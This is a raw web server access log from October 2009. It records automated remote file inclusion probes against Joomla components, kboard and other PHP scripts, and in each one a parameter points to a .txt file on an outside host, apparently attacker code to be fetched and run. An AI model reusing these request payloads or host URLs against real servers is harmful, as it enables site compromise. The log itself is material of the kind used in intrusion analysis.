95.168.183.191 - - [25/Oct/2009:21:35:24 -0700] "GET /logs/access_090720.log%20%20/joomla/index.php?option=com_restaurante&task=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
95.168.183.191 - - [25/Oct/2009:21:35:24 -0700] "GET /logs/access_090720.log%20%20/joomla/index.php?option=com_restaurante&task=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
95.168.183.191 - - [25/Oct/2009:21:35:44 -0700] "GET /logs/access_090330.log/joomla/index.php?option=com_restaurante&task=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
95.168.183.191 - - [25/Oct/2009:21:35:44 -0700] "GET /logs/access_090330.log/joomla/index.php?option=com_restaurante&task=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
209.172.51.25 - - [25/Oct/2009:21:35:51 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.tao-clinic.com/store/images/hewlett_packard/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
209.172.51.25 - - [25/Oct/2009:21:35:51 -0700] "GET /logs/access_090608.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.tao-clinic.com/store/images/hewlett_packard/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
209.172.51.25 - - [25/Oct/2009:21:35:52 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.tao-clinic.com/store/images/hewlett_packard/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
95.168.183.191 - - [25/Oct/2009:21:35:54 -0700] "GET /logs/access_090921.log/joomla/index.php?option=com_restaurante&task=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
95.168.183.191 - - [25/Oct/2009:21:35:55 -0700] "GET /logs/access_090921.log/joomla/index.php?option=com_restaurante&task=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
209.172.51.25 - - [25/Oct/2009:21:35:58 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.tao-clinic.com/store/images/hewlett_packard/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
209.172.51.25 - - [25/Oct/2009:21:36:00 -0700] "GET /logs/access_090608.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.tao-clinic.com/store/images/hewlett_packard/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
209.172.51.25 - - [25/Oct/2009:21:36:01 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.tao-clinic.com/store/images/hewlett_packard/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
209.172.51.25 - - [25/Oct/2009:21:36:50 -0700] "GET /logs/access_090831.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.tao-clinic.com/store/images/hewlett_packard/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
209.172.51.25 - - [25/Oct/2009:21:37:00 -0700] "GET /logs/access_090831.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.tao-clinic.com/store/images/hewlett_packard/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
95.168.183.191 - - [25/Oct/2009:21:37:52 -0700] "GET /logs/access_090720.log/joomla/index.php?option=com_restaurante&task=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
110.45.147.248 - - [25/Oct/2009:21:37:53 -0700] "GET /logs/access_090525.log//?_zb_path=http://www.lovelynashville.com/thumbnails/mawar.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
110.45.147.248 - - [25/Oct/2009:21:37:54 -0700] "GET /logs//?_zb_path=http://www.lovelynashville.com/thumbnails/mawar.txt?????? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
110.45.147.248 - - [25/Oct/2009:21:37:54 -0700] "GET /?_zb_path=http://www.lovelynashville.com/thumbnails/mawar.txt?????? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
110.45.147.248 - - [25/Oct/2009:21:37:54 -0700] "GET /logs//?_zb_path=http://www.lovelynashville.com/thumbnails/mawar.txt?????? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
110.45.147.248 - - [25/Oct/2009:21:37:54 -0700] "GET /logs/access_090525.log//?_zb_path=http://www.lovelynashville.com/thumbnails/mawar.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
110.45.147.248 - - [25/Oct/2009:21:37:54 -0700] "GET /?_zb_path=http://www.lovelynashville.com/thumbnails/mawar.txt?????? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
95.168.183.191 - - [25/Oct/2009:21:38:02 -0700] "GET /logs/access_090720.log/joomla/index.php?option=com_restaurante&task=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
70.38.52.2 - - [25/Oct/2009:21:38:12 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.tao-clinic.com/store/images/hewlett_packard/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
70.38.52.2 - - [25/Oct/2009:21:38:13 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.tao-clinic.com/store/images/hewlett_packard/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
70.38.52.2 - - [25/Oct/2009:21:38:13 -0700] "GET /logs/access_090608.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.tao-clinic.com/store/images/hewlett_packard/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
38.110.65.1 - - [25/Oct/2009:21:38:14 -0700] "GET /logs/access_090608.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.tao-clinic.com/store/images/hewlett_packard/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:21:38:56 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:21:38:56 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:21:38:56 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:21:38:56 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.galf.org"
70.38.52.2 - - [25/Oct/2009:21:39:22 -0700] "GET /logs/access_090831.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.tao-clinic.com/store/images/hewlett_packard/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
38.110.65.1 - - [25/Oct/2009:21:39:30 -0700] "GET /logs/access_090831.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.tao-clinic.com/store/images/hewlett_packard/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
70.38.52.2 - - [25/Oct/2009:21:40:35 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.tao-clinic.com/store/images/hewlett_packard/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
70.38.52.2 - - [25/Oct/2009:21:40:35 -0700] "GET /logs/access_090608.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.tao-clinic.com/store/images/hewlett_packard/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
70.38.52.2 - - [25/Oct/2009:21:40:35 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.tao-clinic.com/store/images/hewlett_packard/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
110.45.147.248 - - [25/Oct/2009:21:40:36 -0700] "GET /logs/access_090525.log%20%20//?_zb_path=http://www.lovelynashville.com/thumbnails/mawar.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
110.45.147.248 - - [25/Oct/2009:21:40:38 -0700] "GET /logs/access_090525.log%20%20//?_zb_path=http://www.lovelynashville.com/thumbnails/mawar.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
70.38.52.2 - - [25/Oct/2009:21:41:44 -0700] "GET /logs/access_090831.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.tao-clinic.com/store/images/hewlett_packard/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
193.238.63.50 - - [25/Oct/2009:21:42:07 -0700] "GET /logs/access_090608.log//components/com_simpleboard/image_upload.php?sbp=http://www.tao-clinic.com/store/images/hewlett_packard/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
193.238.63.50 - - [25/Oct/2009:21:42:13 -0700] "GET /logs/access_090608.log//components/com_simpleboard/image_upload.php?sbp=http://www.tao-clinic.com/store/images/hewlett_packard/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
193.238.63.50 - - [25/Oct/2009:21:42:29 -0700] "GET /logs/access_090831.log//components/com_simpleboard/image_upload.php?sbp=http://www.tao-clinic.com/store/images/hewlett_packard/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
193.238.63.50 - - [25/Oct/2009:21:42:32 -0700] "GET /logs/access_090831.log//components/com_simpleboard/image_upload.php?sbp=http://www.tao-clinic.com/store/images/hewlett_packard/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
70.38.52.2 - - [25/Oct/2009:21:45:21 -0700] "GET /logs/access_090608.log//components/com_simpleboard/image_upload.php?sbp=http://www.tao-clinic.com/store/images/hewlett_packard/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
70.38.52.2 - - [25/Oct/2009:21:45:21 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.tao-clinic.com/store/images/hewlett_packard/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
70.38.52.2 - - [25/Oct/2009:21:45:21 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.tao-clinic.com/store/images/hewlett_packard/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
70.38.52.2 - - [25/Oct/2009:21:46:43 -0700] "GET /logs/access_090831.log//components/com_simpleboard/image_upload.php?sbp=http://www.tao-clinic.com/store/images/hewlett_packard/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.10.136.56 - - [25/Oct/2009:21:46:54 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.seeum.co.kr/zero/zipcode/crespon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.10.136.56 - - [25/Oct/2009:21:46:54 -0700] "GET /logs/access_090511.log//include/admin.lib.inc.php?site_path=http://www.seeum.co.kr/zero/zipcode/crespon1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.10.136.56 - - [25/Oct/2009:21:46:54 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.seeum.co.kr/zero/zipcode/crespon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
110.45.147.248 - - [25/Oct/2009:21:47:48 -0700] "GET /logs/access_090720.log%20%20//?_zb_path=http://www.lovelynashville.com/thumbnails/mawar.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.10.136.56 - - [25/Oct/2009:21:47:56 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.seeum.co.kr/zero/zipcode/crespon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.10.136.56 - - [25/Oct/2009:21:47:56 -0700] "GET /logs/access_090511.log//include/admin.lib.inc.php?site_path=http://www.seeum.co.kr/zero/zipcode/crespon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.10.136.56 - - [25/Oct/2009:21:47:56 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.seeum.co.kr/zero/zipcode/crespon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
110.45.147.248 - - [25/Oct/2009:21:48:07 -0700] "GET /logs/access_090720.log%20%20//?_zb_path=http://www.lovelynashville.com/thumbnails/mawar.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [25/Oct/2009:21:48:24 -0700] "GET /logs/access_090928.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://home.megapass.co.kr/~leekimuk/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [25/Oct/2009:21:48:24 -0700] "GET /kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://home.megapass.co.kr/~leekimuk/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [25/Oct/2009:21:48:24 -0700] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://home.megapass.co.kr/~leekimuk/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [25/Oct/2009:21:48:38 -0700] "GET /kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://home.megapass.co.kr/~leekimuk/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [25/Oct/2009:21:48:38 -0700] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://home.megapass.co.kr/~leekimuk/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [25/Oct/2009:21:48:38 -0700] "GET /logs/access_090928.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://home.megapass.co.kr/~leekimuk/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [25/Oct/2009:21:48:43 -0700] "GET /logs/access_091012.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://home.megapass.co.kr/~leekimuk/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [25/Oct/2009:21:48:54 -0700] "GET /logs/access_091012.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://home.megapass.co.kr/~leekimuk/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:21:48:59 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:21:48:59 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:21:48:59 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:21:48:59 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.galf.org"
211.232.85.247 - - [25/Oct/2009:21:49:01 -0700] "GET /logs/access_090817.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://home.megapass.co.kr/~leekimuk/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.10.136.56 - - [25/Oct/2009:21:49:33 -0700] "GET /logs/access_090511.log%20%20//include/admin.lib.inc.php?site_path=http://www.seeum.co.kr/zero/zipcode/crespon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.10.136.56 - - [25/Oct/2009:21:50:17 -0700] "GET /logs/access_090629.log%20%20//include/admin.lib.inc.php?site_path=http://www.seeum.co.kr/zero/zipcode/crespon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.10.136.56 - - [25/Oct/2009:21:50:22 -0700] "GET /logs/access_090511.log%20%20//include/admin.lib.inc.php?site_path=http://www.seeum.co.kr/zero/zipcode/crespon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.10.136.56 - - [25/Oct/2009:21:51:04 -0700] "GET /logs/access_090629.log%20%20//include/admin.lib.inc.php?site_path=http://www.seeum.co.kr/zero/zipcode/crespon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
110.45.147.248 - - [25/Oct/2009:21:52:01 -0700] "GET /logs/access_090720.log//?_zb_path=http://www.lovelynashville.com/thumbnails/mawar.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
110.45.147.248 - - [25/Oct/2009:21:52:05 -0700] "GET /logs/access_090720.log//?_zb_path=http://www.lovelynashville.com/thumbnails/mawar.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
209.172.51.25 - - [25/Oct/2009:21:52:07 -0700] "GET /logs/access_090608.log//components/com_simpleboard/image_upload.php?sbp=http://www.tao-clinic.com/store/images/hewlett_packard/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
209.172.51.25 - - [25/Oct/2009:21:54:16 -0700] "GET /logs/access_090608.log//components/com_simpleboard/image_upload.php?sbp=http://www.tao-clinic.com/store/images/hewlett_packard/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
63.223.85.28 - - [25/Oct/2009:21:54:32 -0700] "GET /logs/access_090803.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
63.223.85.28 - - [25/Oct/2009:21:54:32 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.10.136.56 - - [25/Oct/2009:21:56:08 -0700] "GET /logs/access_090629.log//include/admin.lib.inc.php?site_path=http://www.seeum.co.kr/zero/zipcode/crespon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.10.136.56 - - [25/Oct/2009:21:56:16 -0700] "GET /logs/access_090629.log//include/admin.lib.inc.php?site_path=http://www.seeum.co.kr/zero/zipcode/crespon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
118.45.190.163 - - [25/Oct/2009:21:56:38 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
62.140.23.192 - - [25/Oct/2009:21:56:51 -0700] "GET ////skin/ggambo7002_board/comment_modify.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
62.140.23.192 - - [25/Oct/2009:21:56:51 -0700] "GET /logs/access_091012.log%20%20/////skin/ggambo7002_board/comment_modify.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
62.140.23.192 - - [25/Oct/2009:21:56:52 -0700] "GET /logs/////skin/ggambo7002_board/comment_modify.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
118.45.190.163 - - [25/Oct/2009:21:56:54 -0700] "GET /logs/access_090803.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
118.45.190.163 - - [25/Oct/2009:21:56:54 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
62.140.23.192 - - [25/Oct/2009:21:56:55 -0700] "GET ////skin/ggambo7002_board/comment_modify.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
62.140.23.192 - - [25/Oct/2009:21:56:55 -0700] "GET /logs/access.log%20%20/////skin/ggambo7002_board/comment_modify.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
62.140.23.192 - - [25/Oct/2009:21:56:55 -0700] "GET /logs/////skin/ggambo7002_board/comment_modify.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
118.45.190.163 - - [25/Oct/2009:21:57:23 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
118.45.190.163 - - [25/Oct/2009:21:57:24 -0700] "GET /logs/access_090803.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
118.45.190.163 - - [25/Oct/2009:21:57:24 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
118.45.190.163 - - [25/Oct/2009:21:57:36 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
118.45.190.163 - - [25/Oct/2009:21:57:38 -0700] "GET /logs/access_090803.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
118.45.190.163 - - [25/Oct/2009:21:57:38 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
62.140.23.192 - - [25/Oct/2009:21:57:50 -0700] "GET /logs/access_091012.log%20%20/////skin/ggambo7002_board/comment_modify.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
62.140.23.192 - - [25/Oct/2009:21:57:50 -0700] "GET ////skin/ggambo7002_board/comment_modify.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
62.140.23.192 - - [25/Oct/2009:21:57:50 -0700] "GET /logs/////skin/ggambo7002_board/comment_modify.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
62.140.23.192 - - [25/Oct/2009:21:57:51 -0700] "GET ////skin/ggambo7002_board/comment_modify.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
62.140.23.192 - - [25/Oct/2009:21:57:51 -0700] "GET /logs/////skin/ggambo7002_board/comment_modify.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
62.140.23.192 - - [25/Oct/2009:21:57:51 -0700] "GET /logs/access.log%20%20/////skin/ggambo7002_board/comment_modify.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
118.45.190.163 - - [25/Oct/2009:21:58:09 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
118.45.190.163 - - [25/Oct/2009:21:58:09 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
118.45.190.163 - - [25/Oct/2009:21:58:09 -0700] "GET /logs/access_090803.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:21:58:52 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:21:58:52 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:21:58:52 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:21:58:52 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.galf.org"
91.121.3.184 - - [25/Oct/2009:22:01:52 -0700] "GET /admincp.php?rootpath=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
91.121.3.184 - - [25/Oct/2009:22:01:52 -0700] "GET /admincp.php?rootpath=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
91.121.3.184 - - [25/Oct/2009:22:01:52 -0700] "GET /admincp.php?rootpath=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
91.121.3.184 - - [25/Oct/2009:22:02:06 -0700] "GET /admincp.php?rootpath=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
91.121.3.184 - - [25/Oct/2009:22:02:06 -0700] "GET /admincp.php?rootpath=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
91.121.3.184 - - [25/Oct/2009:22:02:06 -0700] "GET /admincp.php?rootpath=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
